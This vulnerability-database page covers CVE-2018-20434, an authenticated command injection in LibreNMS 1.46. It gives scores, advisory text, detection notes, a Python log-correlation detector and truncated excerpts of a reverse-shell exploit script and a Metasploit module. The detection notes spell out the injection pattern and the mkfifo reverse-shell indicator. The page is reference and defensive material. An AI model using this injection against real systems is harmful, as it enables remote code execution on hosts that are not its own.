CVE-2018-20434
Published 2019-04-24
Priority P181 · critical · 9.8 CVSS 3.0
AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 71.49% (99.3th percentile)
LibreNMS 1.46 allows remote attackers to execute arbitrary OS commands by using the $_POST['community'] parameter to html/pages/addhost.inc.php during creation of a new device, and then making a /ajax_output.php?id=capture&format=text&type=snmpwalk&hostname=localhost request that triggers html/includes/output/capture.inc.php command mishandling.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| librenms | librenms | — | — |
Detection & IOCs
- Monitor POST requests to /addhost containing shell metacharacters (single quotes, $(), backticks, semicolons) in the 'community' parameter, which is the injection point for this CVE.
- Alert on GET requests to /ajax_output.php with query parameters id=capture, format=text, type=snmpwalk immediately following a suspicious POST to /addhost — this two-stage request sequence is the exploitation pattern.
- Detect creation of /tmp/f as a named pipe (mkfifo) on the LibreNMS host, which is a strong indicator of the reverse shell payload being executed.
- The exploit requires prior authentication; look for login attempts followed immediately by POST /addhost and GET /ajax_output.php from the same source IP as a correlated attack chain.
- The Metasploit module uses a randomly generated 6–12 character alpha hostname for the injected device; alert on device additions with random-looking hostnames paired with community strings containing shell injection patterns.
- The community parameter payload pattern to detect is a leading single-quote followed by a shell command and a trailing comment character (#), e.g. '; <cmd>#'
- Exploitation requires valid authenticated credentials to LibreNMS; unauthenticated exploitation is not possible for this CVE.
- The vulnerable version is specifically LibreNMS 1.46; confirm the deployed version before applying detections to avoid false positives on patched instances.
- The Metasploit module attempts to clean up by deleting the injected device via POST /delhost after exploitation; forensic artefacts of the device addition may be short-lived in the LibreNMS database.
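The two-stage correlation from the detection notes above, as an added example that is not part of the original page or of any LibreNMS tooling. The JSON-lines event format (a proxy log that records POST bodies), its field names and the 300-second window are assumptions, and the sample events are constructed.

```python
import json
import re
from urllib.parse import parse_qs, urlsplit

# Shell metacharacters named in the detection notes: single quote, $(), backtick, semicolon.
META = re.compile(r"['`;]|\$\(")
CAPTURE = {"id": "capture", "format": "text", "type": "snmpwalk"}
WINDOW = 300  # seconds allowed between the two stages; an assumed tuning value

# Constructed sample events (assumed JSON-lines proxy log that records POST bodies).
SAMPLE = """\
{"ts": 100, "src": "198.51.100.7", "method": "POST", "url": "/addhost", "body": "hostname=qzkvmt&community=%27%3B+PLACEHOLDER_CMD+%23"}
{"ts": 104, "src": "198.51.100.7", "method": "GET", "url": "/ajax_output.php?id=capture&format=text&type=snmpwalk&hostname=localhost", "body": ""}
{"ts": 200, "src": "192.0.2.10", "method": "POST", "url": "/addhost", "body": "hostname=core-sw1&community=public"}
{"ts": 205, "src": "192.0.2.10", "method": "GET", "url": "/ajax_output.php?id=capture&format=text&type=snmpwalk&hostname=core-sw1", "body": ""}
{"ts": 900, "src": "203.0.113.5", "method": "POST", "url": "/addhost", "body": "hostname=x&community=a%60b"}
"""

def suspicious_community(body):
    """Return the URL-decoded community value if it contains shell metacharacters."""
    for value in parse_qs(body, keep_blank_values=True).get("community", []):
        if META.search(value):
            return value
    return None

def is_capture_request(url):
    parts = urlsplit(url)
    query = parse_qs(parts.query)
    return parts.path == "/ajax_output.php" and all(
        query.get(k, [None])[0] == v for k, v in CAPTURE.items())

def detect(lines):
    """Return alerts: 'injection' for stage one, 'chain' when stage two follows it."""
    pending, alerts = {}, []
    for line in lines:
        ev = json.loads(line)
        path = urlsplit(ev["url"]).path
        if ev["method"] == "POST" and path == "/addhost":
            value = suspicious_community(ev["body"])
            if value is not None:
                pending[ev["src"]] = ev["ts"]
                alerts.append(("injection", ev["src"], value))
        elif ev["method"] == "GET" and is_capture_request(ev["url"]):
            start = pending.get(ev["src"])
            if start is not None and ev["ts"] - start <= WINDOW:
                alerts.append(("chain", ev["src"], ev["url"]))
    return alerts

ALERTS = detect(SAMPLE.splitlines())
```

The capture request from 192.0.2.10 raises nothing because its preceding /addhost POST carried a clean community string; only the same-source sequence with a metacharacter-bearing value is escalated to `chain`.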
CVSS provenance
nvd · v3.0 · 9.8 CRITICAL · CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd · v2.0 · 10.0 CRITICAL · AV:N/AC:L/Au:N/C:C/I:C/A:C
GHSA
LibreNMS arbitrary OS commands execution
ghsa·2022-05-24
CVE-2018-20434 [CRITICAL] CWE-78 LibreNMS arbitrary OS commands execution
LibreNMS 1.46 allows remote attackers to execute arbitrary OS commands by using the `$_POST['community']` parameter to `html/pages/addhost.inc.php` during creation of a new device, and then making a `/ajax_output.php?id=capture&format=text&type=snmpwalk&hostname=localhost` request that triggers `html/includes/output/capture.inc.php` command mishandling.
OSV
LibreNMS arbitrary OS commands execution
osv·2022-05-24
CVE-2018-20434 [CRITICAL] LibreNMS arbitrary OS commands execution
LibreNMS 1.46 allows remote attackers to execute arbitrary OS commands by using the `$_POST['community']` parameter to `html/pages/addhost.inc.php` during creation of a new device, and then making a `/ajax_output.php?id=capture&format=text&type=snmpwalk&hostname=localhost` request that triggers `html/includes/output/capture.inc.php` command mishandling.
No detection rules found.
Exploit-DB
LibreNMS 1.46 - 'addhost' Remote Code Execution
exploitdb·2019-06-28·CVSS 9.8
CVE-2018-20434 [CRITICAL] LibreNMS 1.46 - 'addhost' Remote Code Execution
---
```python
#!/usr/bin/python
'''
# Exploit Title: LibreNMS v1.46 authenticated Remote Code Execution
# Date: 24/12/2018
# Exploit Author: Askar (@mohammadaskar2)
# CVE : CVE-2018-20434
# Vendor Homepage: https://www.librenms.org/
# Version: v1.46
# Tested on: Ubuntu 18.04 / PHP 7.2.10
'''
import requests
from urllib import urlencode
import sys
if len(sys.argv) != 5:
    print "[!] Usage : ./exploit.py http://www.example.com cookies rhost rport"
    sys.exit(0)
# target (user input)
target = sys.argv[1]
# cookies (user input)
raw_cookies = sys.argv[2]
# remote host to connect to
rhost = sys.argv[3]
# remote port to connect to
rport = sys.argv[4]
# hostname to use (change it if you want)
hostname = "dummydevice"
# payload to create reverse shell
pa
```
Exploit-DB
LibreNMS - addhost Command Injection (Metasploit)
exploitdb·2019-06-05
CVE-2018-20434 LibreNMS - addhost Command Injection (Metasploit)
---
```ruby
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'LibreNMS addhost Command Injection',
'Description' => %q(
This module exploits a command injection vulnerability in the open source
network management software known as LibreNMS. The community parameter used
in a POST request to the addhost functionality is unsanitized. This parameter
is later used as part of a shell command that gets passed to the popen function
in capture.inc.php, which can result in execution of arbitrary code.
This module requires authentication to LibreNMS first.
),
'License' => MSF_LICENSE,
'Author' =>
[
'mhaskar', # Vulnerability discovery and PoC
'S
```
Metasploit
LibreNMS addhost Command Injection
metasploit
This module exploits a command injection vulnerability in the open source network management software known as LibreNMS. The community parameter used in a POST request to the addhost functionality is unsanitized. This parameter is later used as part of a shell command that gets passed to the popen function in capture.inc.php, which can result in execution of arbitrary code. This module requires authentication to LibreNMS first.
No writeups or analysis indexed.
- http://packetstormsecurity.com/files/153188/LibreNMS-addhost-Command-Injection.html
- http://packetstormsecurity.com/files/153448/LibreNMS-1.46-addhost-Remote-Code-Execution.html
- https://drive.google.com/file/d/1LcGmOY8x-TG-wnNr-cM_f854kxk0etva/view?usp=sharing
- https://gist.github.com/mhaskar/516df57aafd8c6e3a1d70765075d372d
- https://shells.systems/librenms-v1-46-remote-code-execution-cve-2018-20434/